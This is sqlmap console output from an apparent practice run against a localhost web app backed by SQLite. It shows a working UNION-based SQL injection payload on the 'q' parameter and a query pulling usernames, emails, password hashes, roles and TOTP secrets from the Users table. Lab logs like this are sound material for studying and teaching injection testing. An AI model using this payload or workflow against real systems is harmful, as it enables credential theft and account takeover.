        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.10.3#stable}
|_ -| . ["]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 04:03:50 /2026-04-15/

[04:03:50] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: q (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns (custom)
    Payload: q=test')) UNION ALL SELECT 96,CHAR(113,98,112,98,113)||CHAR(106,112,83,106,80,84,76,109,118,84)||CHAR(113,113,118,120,113),96,96,96,96,96,96,96--
---
[04:03:51] [INFO] testing SQLite
[04:03:51] [INFO] confirming SQLite
[04:03:51] [INFO] actively fingerprinting SQLite
[04:03:51] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[04:03:51] [INFO] fetching SQL SELECT statement query output: 'SELECT id,username,email,password,role,deluxeToken,lastLoginIp,totpSecret,isActive,createdAt FROM Users'
[04:03:53] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 24 times
[04:03:53] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/localhost'

[*] ending @ 04:03:53 /2026-04-15/

